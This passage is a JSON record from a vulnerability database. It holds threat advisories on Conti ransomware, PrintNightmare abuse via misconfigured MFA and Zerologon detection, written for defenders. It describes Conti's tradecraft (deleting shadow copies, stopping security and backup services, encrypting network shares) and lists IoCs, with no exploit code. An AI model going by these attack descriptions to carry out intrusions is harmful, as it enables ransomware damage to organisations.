"SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48", "SECURELIST:E68E0F75B84968E40258A3751781E14A", "SECURELIST:FC1216FC2096CBEE31E247C19D68BEC5"]}, {"type": "seebug", "idList": ["SSV:99156"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1513-1", "OPENSUSE-SU-2020:1526-1"]}, {"type": "symantec", "idList": ["SMNTC-105467"]}, {"type": "talosblog", "idList": ["TALOSBLOG:1F1CE534E194C1DFF1B73DAD241A07B6", "TALOSBLOG:44F665C3D577FC52EF671E9C0CB1750F", "TALOSBLOG:8CDF0A62E30713225D10811E0E977C1D", "TALOSBLOG:A654303FB4331FDBB91B999EC882BE7A"]}, {"type": "thn", "idList": ["THN:0A61A90DD0F88453854B73FE249BC379", "THN:0C87C22B19E7073574F7BA69985A07BF", "THN:10A732F6ED612DC7431BDC9A3CEC3A29", "THN:291CB82C918B55804078A040F3258456", "THN:42B8A8C00254E7187FE0F1EF2AF6F5D7", "THN:4959B86491B72239BCAF1958D167D57D", "THN:6428957E9DED493169A2E63839F98667", "THN:849B821D3503018DA38FAFFBC34DAEBB", "THN:9CE630030E0F3E3041E633E498244C8D", "THN:9FD8A70F9C17C3AF089A104965E48C95", "THN:A30AE10A13D33189456EB192DDF2B8C2", "THN:A52CF43B8B04C0A2F8413E17698F9308", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:C3FF55EFF6D358D430A376476FE270D4", "THN:CAFA6C5C5A34365636215CFD7679FD50", "THN:CF5E93184467C7B8F56A517CE724ABCF", "THN:D31DB501A57ADE0C1DBD12724D8CA44C", "THN:E9454DED855ABE5718E4612A2A750A98", "THN:F35E41E26872B23A7F620C6D8F7E2334", "THN:F4928090525451C50A1B016ED3B0650F", "THN:F53D18B9EB0F8CD70C9289288AC9E2E1"]}, {"type": "threatpost", "idList": ["THREATPOST:0B290DDF3FE14178760FDC2229CB1383", "THREATPOST:1322630273A25CA5A68246679553E2B8", "THREATPOST:1502920D4F50B0D128077B515815C023", "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "THREATPOST:1D03F5885684829E899CEE4F63F5AC27", "THREATPOST:23D55C85EA8B442C858FF058C5E25DBC", "THREATPOST:2449B7C3317E847CB7244592BA73C2B8", "THREATPOST:27150C099FB4771B9DED4F6372D27EB7", "THREATPOST:2F655C93B7912A7C776E1DC1D39822D0", "THREATPOST:30D70449EF03FFC5099B5B141FA079E2", "THREATPOST:3127C5639EF00B80A0DE1B63E8892A5E", "THREATPOST:45F91A2DD716E93AA4DA0D9441E725C6", "THREATPOST:49274446DFD14E2B0DF948DA83A07ECB", "THREATPOST:51A2EB5F46817EF77631C9F4C6429714", "THREATPOST:6494F574043B1EE5082C988D28B55E4C", "THREATPOST:6B7259AD7487C6D17E0A301E14AEB7CB", "THREATPOST:6F7C157D4D3EB409080D90F02185E728", "THREATPOST:71C45E867DCD99278A38088B59938B48", "THREATPOST:779B904F971138531725D1E57FDFF9DD", "THREATPOST:827A7E3B49365A0E49A11A05A5A29192", "THREATPOST:870C912F079364DE3A8DADFDBE4E42D1", "THREATPOST:891CC19008EEE7B8F1523A2BD4A37993", "THREATPOST:8D4EA8B0593FD44763915E703BC9AB72", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:933913B1D9B9CF84D33FECFC77C2FDC8", "THREATPOST:98D815423018872E6E596DAA8131BF3F", "THREATPOST:A1A1E1AC8DB384C8FA2988F9A9121141", "THREATPOST:A47D83D4BBBE115E6424755328525B9D", "THREATPOST:A5FC4C5797CA53E30A3426AF0843BFFE", "THREATPOST:A8242348917526090B7A1B23735D5C6C", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:ADA9E95C8FD42722E783C74443148525", "THREATPOST:BBAE8AE32C2E8EC0271BBA9D0498A825", "THREATPOST:BC4ECD6616ADCCFFD5717D0A9A0D065B", "THREATPOST:D75255A60A5F03024D8AEF37C1FD4993", "THREATPOST:DBA639CBD82839FDE8E9F4AE1031AAF7", "THREATPOST:E95FF75420C541DF65D4D795CF73B5CE", "THREATPOST:F1065D29808C9165285986CCB6DEBB5A", "THREATPOST:F60D403369A535076F39A474F74C925E", "THREATPOST:F9CF34A304B5CA2189D5CEDA09C8B0CB"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:8A87E8F1BA63B9BB2E84C23288C44FDC"]}, {"type": "ubuntu", "idList": ["USN-4510-1", "USN-4510-2", "USN-4559-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-1472"]}, {"type": "veracode", "idList": ["VERACODE:27548"]}, {"type": "zdt", "idList": ["1337DAY-ID-32993", "1337DAY-ID-35274", "1337DAY-ID-36066", "1337DAY-ID-36067"]}]}, "epss": [{"cve": "CVE-2018-8453", "epss": "0.952680000", "percentile": "0.988870000", "modified": "2023-03-19"}, {"cve": "CVE-2020-1472", "epss": "0.973850000", "percentile": "0.998190000", "modified": "2023-03-19"}, {"cve": "CVE-2021-22986", "epss": "0.975150000", "percentile": "0.999680000", "modified": "2023-03-19"}, {"cve": "CVE-2021-34527", "epss": "0.970380000", "percentile": "0.995590000", "modified": "2023-03-19"}], "vulnersScore": 0.6}, "_state": {"dependencies": 1659988328, "score": 1684014194, "epss": 1679290575}, "_internal": {"score_hash": "cdef1226354ca3945f4b48d81bc7496b"}}

{"hivepro": [{"lastseen": "2021-09-26T09:19:08", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/09/TA202137.pdf>)\n\nConti Ransomware targets enterprises who have not patched their systems by exploiting old vulnerabilities. Conti Ransomware steals sensitive information from businesses and demands a ransom in exchange. CISA has issued a warning about the rise in Conti ransomware attacks. To avoid becoming a victim of Conti ransomware, the Hive Pro Threat Research team suggested you patch these vulnerabilities.\n\nThe techniques used by the Conti includes:\n\n * T1078 - Valid Accounts\n * T1133 - External Remote Services\n * T1566.001 - Phishing: Spearphishing Attachment\n * T1566.002 - Phishing: Spearphishing Link\n * T1059.003 - Command and Scripting Interpreter: Windows Command Shell\n * T1106 - Native API\n * T1055.001 - Process Injection: Dynamic-link Library Injection\n * T1027 - Obfuscated Files or Information\n * T1140 - Deobfuscate/Decode Files or Information\n * T1110 - Brute Force\n * T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting\n * T1016 - System Network Configuration Discovery\n * T1049 - System Network Connections Discovery\n * T1057 - Process Discovery\n * T1083 - File and Directory Discovery\n * T1135 - Network Share Discovery\n * T1021.002 - Remote Services: SMB/Windows Admin Shares\n * T1080 - Taint Shared Content\n * T1486 - Data Encrypted for Impact\n * T1489 - Service Stop\n * T1490 - Inhibit System Recovery\n\n#### Actor Details\n\n\n\n#### Vulnerability Details\n\n\n\n#### Indicators of Compromise (IoCs)\n\n**Type** | **Value** \n---|--- \nIPV4 | 162.244.80[.]235 \n85.93.88[.]165 \n185.141.63[.]120 \n82.118.21[.]1 \n \n#### Patch Links\n\n<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472>\n\n#### References\n\n<https://us-cert.cisa.gov/ncas/alerts/aa21-265a>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-09-23T13:47:51", "type": "hivepro", "title": "Are you a victim of the Conti Ransomware?", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2021-34527"], "modified": "2021-09-23T13:47:51", "id": "HIVEPRO:8DA601C83DB9C139357327C06B06CB36", "href": "https://www.hivepro.com/are-you-a-victim-of-the-conti-ransomware/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-22T07:28:58", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have issued an alert for enterprises that Russian state-sponsored cyber attackers have obtained network access by exploiting default MFA protocols and a known vulnerability. Russian state-sponsored cyber attackers got initial access to the target organization by using compromising credentials and registering a new device in the organization&#x27;s Duo multi-factor authentication (MFA). The actors obtained the credentials using a brute-force password guessing attack, which provided them with access to a victim account with a basic, predictable password. The victim account had been unenrolled from Duo after a long period of inactivity, but it had not been deactivated in Active Directory. The actors were able to enroll a new device for this account, satisfy the authentication requirements, and get access to the victim network since Duo&#x27;s default configuration settings allow for the re-enrollment of a new device for inactive accounts. Using the stolen account, Russian state-sponsored cyber attackers gained administrator rights by exploiting the &quot;PrintNightmare&quot; vulnerability (CVE-2021-34527). Furthermore, the cyber actors were able to obtain required material by moving laterally to the victim&#x27;s cloud storage and email accounts. The organizations can apply the following mitigations: To prevent against &quot;fail open&quot; and re-enrollment scenarios, enforce MFA and examine configuration restrictions. Assure that inactive accounts are deactivated consistently across the Active Directory and MFA systems. Ensure that inactive accounts are deactivated equally across Active Directory, MFA systems, and other systems. Update software such as operating systems, apps, and hardware on a regular basis. The Mitre TTPs used in the current attack are:TA0001 - Initial AccessTA0003 - PersistenceTA0004 - Privilege EscalationTA0005 - Defense EvasionTA0006 - Credential AccessTA0007 - DiscoveryTA0008 - Lateral MovementTA0009 - CollectionT1078: Valid AccountsT1133: External Remote ServicesT1556: Modify Authentication ProcessT1068: Exploitation for Privilege EscalationT1112: Modify RegistryT1110.001: Brute Force: Password GuessingT1003.003: OS Credential Dumping: NTDST1018: Remote System DiscoveryT1560.001: Archive Collected Data: Archive via Utility Vulnerability Details Indicators of Compromise (IoCs) Patch Link https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 References https://www.cisa.gov/uscert/ncas/alerts/aa22-074a", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-18T13:58:03", "type": "hivepro", "title": "Russian threat actors leveraging misconfigured multifactor authentication to exploit PrintNightmare vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-03-18T13:58:03", "id": "HIVEPRO:8D09682ECAC92A6EA4B81D42F45F0233", "href": "https://www.hivepro.com/russian-threat-actors-leveraging-misconfigured-mfa-to-exploit-printnightmare-vulnerability/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-11-18T18:37:13", "description": "Conti is a sophisticated Ransomware-as-a-Service (RaaS) model first detected in December 2019. Since its inception, its use has grown rapidly and has even displaced the use of other RaaS tools like Ryuk. The [Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI)](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/22/cisa-fbi-and-nsa-release-joint-cybersecurity-advisory-conti>) issued a warning about Conti in Sept 2021, noting that they had observed it being used in more than 400 cyberattacks globally, though concentrated in North America and Europe.\n\nThe most common initial infection vectors used are spear phishing and RDP (Remote Desktop Protocol) services. Phishing emails work either through malicious attachments, such as Word documents with an embedded macro that can be used to drop/download BazarLoader, Trickbot, IceID trojans, or via social engineering tactics employed to get the victim to provide additional information or access credentials. Following initial access, attackers download and execute a Cobalt Strike beacon DLL to gather information about domain admin accounts. Additionally, threat actors use Kerberos attacks to attempt to get admin hash in order to conduct brute force attacks.\n\nA Conti affiliate recently leaked what has been dubbed the [Conti playbook](<https://www.bleepingcomputer.com/news/security/translated-conti-ransomware-playbook-gives-insight-into-attacks/>). The playbook revealed that Conti actors also exploit vulnerabilities in unpatched assets to escalate privileges and move laterally across a victim\u2019s network. They check for the &quot;PrintNightmare&quot; vulnerability (CVE-2021-34527) in Windows Print spooler service, EternalBlue vulnerability (CVE-2017-0144) in Microsoft Windows Server Message Block, and the &quot;Zerologon&quot; vulnerability (CVE-2020-1472) in Microsoft Active Directory Domain Controller. The playbook has been translated from Russian to English by security researchers and has provided other useful Indicators of Compromise (IoC).\n\nConti actors also use the RouterScan tool to identify router devices in a provided range of IPs and attempt to find logins/passwords from a standard list available with the RouterScan tool. They then install AnyDesk or Atera on the target machine to maintain an open communication channel. Like other ransomware attacks, Conti actors exfiltrate data from victims\u2019 networks to cloud storage services like MEGA and then deploy Conti ransomware. To upload data on cloud storage Conti uses open-source Rclone command-line software. They use a double extortion approach in which they demand a ransom to release the encrypted data or threaten to publicly release it if a ransom is not paid. They may also sell the data to the highest bidder.\n\n### Technical Details:\n\nConti ransomware uses obfuscation. The most notable use is to hide various Windows API calls used by the malware. It is common for some malware to lookup API calls during execution. Initially, it brings import module names then decrypts the API names and gets their addresses.\n\nFig. 1 De-obfuscation of Windows API\n\nConti uses a unique String Decryption Routine that is applied to almost every string text or API name used by the malware as shown in Fig. 2:\n\nFig. 2 String Decryption Routine\n\nAfter getting API addresses, it calls for `CreateMutexA` API with the Mutex Value of &quot;_CONTI_&quot; as shown below in Fig. 3:\n\nFig. 3 Create Mutex\n\nIt deletes Windows Volume Shadow Copies and also resizes shadow storage for drives C to H:\n\nFig. 4 Deletes Windows Volume Shadow Copy\n\nNext, Conti executes commands for stopping potential Windows Services related to antivirus, security, backup, database, and email solutions:\n\nFig. 5 Stop Potential Windows Services\n\nThe table below contains the names of the Windows Services that Conti stopped by calling the code in Fig. 5 in the loop.\n\nMSSQL$BKUPEXEC| MSSQL$SQLEXPRESS| MSSQLFDLauncher$SHAREPOINT \n---|---|--- \nMSSQL$ECWDB2| MSSQL$SYSTEM_BGC| MSSQLFDLauncher$SQL_2008 \nMSSQL$PRACTICEMGT| MSSQL$TPS| MSSQLFDLauncher$SYSTEM_BGC \nMSSQL$PRACTTICEBGC| MSSQL$TPSAMA| MSSQLFDLauncher$TPS \nMSSQL$PROD| MSSQL$VEEAMSQL2008R2| MSSQLFDLauncher$TPSAMA \nMSSQL$PROFXENGAGEMENT| MSSQL$VEEAMSQL2008R2| MSSQLSERVER \nMSSQL$SBSMONITORING| MSSQL$VEEAMSQL2012| MSSQLServerADHelper \nMSSQL$SHAREPOINT| MSSQLFDLauncher| MSSQLServerADHelper100 \nMSSQL$SOPHOS| MSSQLFDLauncher$PROFXENGAGEMENT| MSSQLServerOLAPService \nMSSQL$SQL_2008| MSSQLFDLauncher$SBSMONITORING| MySQL57 \nAcronis VSS Provider| Mfemms| DCAgent \nAcronisAgent| Mfevtp| EhttpSrv \nAcrSch2Svc| MMS| Ekrn \nAntivirus| Mozyprobackup| Enterprise Client Service \nARSM| MsDtsServer| EPSecurityService \nAVP| MsDtsServer100| EPUpdateService \nBackupExecAgentAccelerator| MsDtsServer110| EraserSvc11710 \nBackupExecAgentBrowser| MSExchangeES| EsgShKernel \nBackupExecDeviceMediaService| MSExchangeIS| ESHASRV \nBackupExecJobEngine| MSExchangeMGMT| FA_Scheduler \nBackupExecManagementService| MSExchangeMTA| MSOLAP$TPSAMA \nBackupExecRPCService| MSExchangeSA| McShield \nBackupExecVSSProvider| MSExchangeSRS| McTaskManager \nBedbg| msftesql$PROD| Mfefire \nIISAdmin| MSOLAP$SQL_2008| Klnagent \nIMAP4Svc| MSOLAP$SYSTEM_BGC| MSOLAP$TPS \n \nConti also leverages the Windows Restart Manager to close applications and services that are running in order to make them available for encryption and to maximize the damage:\n\nFig. 6 Unlock files with Windows Restart Manager\n\nIt collects information about drives and drive types present on compromised systems:\n\nFig. 7 Collect Drives Information\n\nAs shown in Fig. 8, Conti uses multi-threaded tactics. It calls `CreateIoCompletionPort` API to create multiple instances of worker threads into memory to wait for data. Once the file listing is completed, it is passed to the worker threads. Utilizing the computing power of multi-core CPUs, the data is quickly encrypted:\n\nFig. 8 Implementation of Multi-threaded Processing Fig. 9 Multiple Threads Perform File Encryption\n\nConti then iterates files on the local system and those on remote SMB network shares to determine what data to encrypt. It looks for folders and drives shared on remote systems using `NetShareEnum` API. If the remote share is accessible, it encrypts the files present in that share:\n\nFig. 10 Getting Info of Remote Shares\n\nIt collects ARP cache information from the local system using the `GetIpNetTable` API. ARP cache information is a list of all the systems with which the computer recently communicated. It checks for &quot;172.&quot;, &quot;192.168.&quot; etc., on the collected IP list. If an IP address is in a different range it skips that system from encryption:\n\nFig. 11 Collect ARP Cache Information\n\nIt uses an AES-256 encryption key per file with a hard-codedRAS-4096 public encryption key. As shown in Fig. 12, the 0x6610 parameter is used while calling the `CryptGenKey` API. 0x6610 is the value of the CALG_AES_256 identifier and is only alg_id:\n\nFig. 12 Create CALG_AES_256 Key\n\nConti has a unique feature that allows attackers to perform file encryption in command line mode:\n\nFig. 13 Command Line Mode of Operation\n\n### Modes of Operation\n\nConti allows 2 command line modes`--encrypt-mode` and `- h`:\n\nFig. 14 Command Line `--encrypt-mode` Mode\n\n`--encrypt-mod` marks which files are encrypted. There are 3 options for its value:`all`, `local`, and `network`. By default, ransomware runs with the `all` parameter:\n\nFig. 15 Command Line `--encrypt-mode` with Value `all`\n\nIn` all`, encryption carried out for - local and network. `network` means that shared resources on the local network will be encrypted:\n\nFig. 16 Command Line `--encrypt-mode` Mode with Value `local` Fig. 17 Command Line `--encrypt-mode` Mode with Value `network`\n\nIn command line `-h` mode, the parameter may contain the name of a file that lists the DNS and NetBIOS addresses of remote servers. The malware will then build a list of folders to ignore during encryption:\n\nFig. 18 Folders Ignored in Encryption\n\nIt skips the following extensions during encryption: .exe, .dll, .sys, .lnk, and .CONTI. It appends the file extension `.CONTI` and creates a ransom note named `CONTI_README.txt` in every folder to notify users about the infection:\n\nFig. 19 __CONTI\u201d Extension Appended to Files\n\n### The Ransom Note:\n\nThe ransom note and the note\u2019s file information are present in the resource of malware files:\n\nFig. 20 Ransom Note Content Fig. 21 Ransom Note Name\n\nIt calls the `LoadResource` API to get ransom note-related information:\n\nFig. 22 Code to Collect Data Related to the Ransom Note\n\nThe ransom note contains 2 email addresses to get in touch with the attackers. The addresses are unique for each victim:\n\nFig. 23 Ransom Note\n\n### IoC:\n \n \n eae876886f19ba384f55778634a35a1d975414e83f22f6111e3e792f706301fe\n\n### TTP Map:\n\nInitial Access| Execution| Persistence| Privilege Escalation| Defense Evasion| Credential Access| Discovery| Lateral Movement| Collection| Command and control| Exfiltration| Impact \n---|---|---|---|---|---|---|---|---|---|---|--- \nValid Accounts (T1078)| Command and Scripting Interpreter: Windows Command Shell (T1059.003)| Valid Accounts (T1078)| Process Injection: Dynamic-link Library Injection (T1055.001)| Obfuscated Files or Information (T1027)| Brute Force (T1110)| System Network Configuration Discovery (T1016)| Remote Services: SMB/Windows Admin Shares (T1021.002)| Archive Collected Data: Archive via Utility (T1560.001)| Remote file copy (T1105)| Exfiltration Over Web Service: Exfiltration to Cloud Storage (T1567.002)| Data Encrypted for Impact (T1486) \nPhishing: Spearphishing Attachment (T1566.001)| Native Application Programming Interface (API)(T1106)| External Remote Services (T1133)| Valid accounts: domain accounts (T1078.002)| Process Injection: Dynamic-link Library Injection (T1055.001)| Steal or Forge Kerberos Tickets: Kerberoasting (T1558.003)| System Network Connections Discovery (T1049)| Taint Shared Content (T1080)| | | | Service Stop (T1489) \nPhishing: Spearphishing Link (T1566.002)| Windows Management Instrumentation (T1047)| Scheduled task/job: scheduled task (T1053.005)| | Deobfuscate/Decode Files or Information (T1140)| OS credential dumping (T1003)| Process Discovery (T1057)| Exploitation of Remote Services (T1210)| | | | Inhibit System Recovery (T1490) \nExploit public-facing application (T1190)| User execution (T1204)| Startup item (T1165)| | Impair defenses: disable or modify tools (T1562.001)| Credentials from password stores (T1555)| File and Directory Discovery (T1083)| Lateral tool transfer (T1570)| | | | \n| Scheduled task/job: scheduled task (T1053.005)| Boot or logon autostart execution: Winlogon Helper DLL (T1547.004)| | | | Network Share Discovery (T1135)| | | | | \n| Command and Scripting Interpreter: PowerShell (T1059.001)| | | | | Remote System Discovery (T1018)| | | | | \n| | | | | | Network Service Scanning (T1046)| | | | | \n| | | | | | Permission groups discovery: domain groups (T1069.002)| | | | | \n| | | | | | System information discovery (T1082)| | | | | \n| | | | | | System owner/user discovery (T1033)| | | | | \n| | | | | | Security software discovery (T1063)| | | | | \n| | | | | | Account Discovery: Local Account (T1087.001)| | | | | \n| | | | | | Permissions Group Discovery: Local Groups (T1069.001)| | | | | \n| | | | | | | | | | | \n \n### Summary\n\nTo defend against threats, Qualys recommends good cyber hygiene practices, and moving to a preventative approach by keeping network configurations, backup, application access, and patching up-to-date.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-18T17:17:56", "type": "qualysblog", "title": "Conti Ransomware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2020-1472", "CVE-2021-34527"], "modified": "2021-11-18T17:17:56", "id": "QUALYSBLOG:6652DB89D03D8AA145C2F888B5590E3F", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-02T12:43:58", "description": "**Update October 1, 2020**: Microsoft has [added step-by-step Zerologon patching instructions ](<https://www.databreachtoday.com/microsoft-issues-updated-patching-directions-for-zerologon-a-15090>)because the original instructions &quot;proved confusing to users and may have caused issues with other business operations.&quot;\n\n**Update October 1, 2020**: Qualys released new QID 91680 to add a remote (unauthenticated) check for the Zerologon vulnerability. The update is included in VULNSIGS-2.4.998-3 and later. \n\n_`QID 91680 : Microsoft Windows Netlogon Elevation of Privilege Vulnerability (unauthenticated check)`_\n\n**Update Sept 24, 2020**: Microsoft is detecting [active attacks leveraging the Zerologon vulnerability](<https://www.zdnet.com/article/microsoft-says-it-detected-active-attacks-leveraging-zerologon-vulnerability/>). Security teams are advised to patch vulnerable systems immediately.\n\nOn Sept 11, 2020, A Dutch team, collectively known as Secura, published an [exploit](<https://github.com/SecuraBV/CVE-2020-1472>) on how an unauthenticated remote user can take control over the domain controller and leverage admin privileges. The vulnerability ([CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)) received the maximum severity rating score of 10.0 based on CVSS v3 Scoring system.\n\nThe prime elements of this vulnerability are the weak encryption standards and the authentication process used in the Netlogon protocol. As new Windows Domain Controllers use standard AES-256 as encryption standards, incorrect use of the AES mode results in spoofing the identity of any computer (DC) account and replace it with all zeroes or empty passwords. As the final output replaces all characters of the password with zeroes, this bug is also well-known as \u201cZerologon\u201d.\n\n**Affected Products**\n\n * Windows Servers 2008\n * Windows Servers 2012 R2\n * Windows Servers 2016\n * Windows Servers 2019\n\nA complete list of affected devices is available on Microsoft\u2019s August 2020 security [advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>).\n\n### Identification of Assets using Qualys VMDR\n\nThe first step in managing vulnerabilities and reducing risk is identification of assets. [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) makes it easy to identify Windows systems.\n\n_`(operatingSystem.category1:``Windows`` and operatingSystem.category2:``Server``)`_\n\n\n\nOnce the hosts are identified, they can be grouped together with a \u2018dynamic tag\u2019, let\u2019s say \u2013 &quot;Zerologon&quot;. This helps in automatically grouping existing hosts with Zerologon as well as any new Windows server that spins up in your environment. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>). \n\n### Discover Zerologon &quot;CVE-2020-1472&quot; Vulnerability\n\nNow that hosts with Zerologon are identified, you want to detect which of these assets have flagged this vulnerability. VMDR automatically detects new vulnerabilities like Zerologon based on the always updated Knowledgebase.\n\nYou can see all your impacted hosts for this vulnerability tagged with the \u2018Zerologon\u2019 asset tag in the vulnerabilities view by using this QQL query:\n\n_`vulnerabilities.vulnerability.qid:91668`_\n\nOR you could modify your search to :\n\n_`Vulnerability - vulnerabilities.vulnerability.qid:91668`_\n\n_`Asset - (operatingSystem.category1:``Windows`` and operatingSystem.category2:``Server``)`_\n\nThis will return a list of all impacted hosts.\n\n\n\nQID 91668 is available in signature version VULNSIGS-2.4.958-3 and above and can be detected using authenticated scanning or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) manifest version 2.4.958.3-2 and above.\n\nAlong with the QID 91668, Qualys released the following IG QID 45461 to help customers track domain controller assets on which netlogon secure channel mode is enabled. This QID can be detected using authenticated scanning using VULNSIGS-2.4.986-3 and above or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) manifest version 2.4.986.3-2 and above. \n\n_`QID 45461 : Microsoft Windows Domain Controller Netlogon Secure Channel Enforcement Mode Enabled`_\n\n**Update October 1, 2020**: Qualys released new QID 91680 to add a remote (unauthenticated) check for the Zerologon vulnerability. The update is included in VULNSIGS-2.4.998-3 and later.\n\n_`QID 91680 : Microsoft Windows Netlogon Elevation of Privilege Vulnerability (unauthenticated check)`_\n\nPlease Note: We have tested the QID across Qualys lab environment on a variety of Windows versions, and we have not observed any issues. In case you experience issues with the remote detection, please reach out to Qualys Support for immediate attention.\n\nUsing VMDR, the Zerologon vulnerability can be prioritized for the following real-time threat indicators (RTIs):\n\n * Remote Code Execution\n * Privilege Escalation\n * Exploit Public\n * Active Attack\n * Denial of Service\n * High Data Loss\n * High Lateral Movement\n * Predicted High Risk\n\n\nVMDR also enables you to stay on top of these threats proactively via the \u2018live feed\u2019 provided for threat prioritization. With \u2018live feed\u2019 updated for all emerging high and medium risks, you can clearly see the impacted hosts against threats. \n\n\n\nSimply click on the impacted assets for the Zerologon threat feed to see the vulnerability and impacted host details. \n\nWith VMDR Dashboard, you can track Zerologon, impacted hosts, their status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of Zerologon vulnerability trends in your environment using [Zerologon Dashboard Link](<https://qualys-secure.force.com/customer/s/article/000006405>).\n\n\n\n### Response by Patching and Remediation \n\nVMDR rapidly remediates the Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select \u201cqid: 91668\u201d in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go for hosts grouped together by a tag \u2013 Zerologon. \n\n\n\nFor proactive, continuous patching, you can create a job without a Patch Window to ensure all hosts will continue to receive the required patches as new patches become available for emerging vulnerabilities.\n\nUsers are encouraged to apply patches as soon as possible.\n\n### Solution\n\nUsers are advised to review their Microsoft Windows installations with Microsoft\u2019s August 2020 security [advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) mentioned above. For Windows devices, a patch to be published in Feb 2021 would place Domain controllers in enforcement mode; to explicitly allow the account by adding an exception for any non-compliant device.\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching the high-priority Zerologon vulnerability CVE-2020-1472.\n\n### **References**\n\n<https://www.secura.com/pathtoimg.php?id=2055>\n\n<https://github.com/SecuraBV/CVE-2020-1472>\n\n<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>\n\n<https://us-cert.cisa.gov/ncas/current-activity/2020/09/14/exploit-netlogon-remote-protocol-vulnerability-cve-2020-1472>", "cvss3": {}, "published": 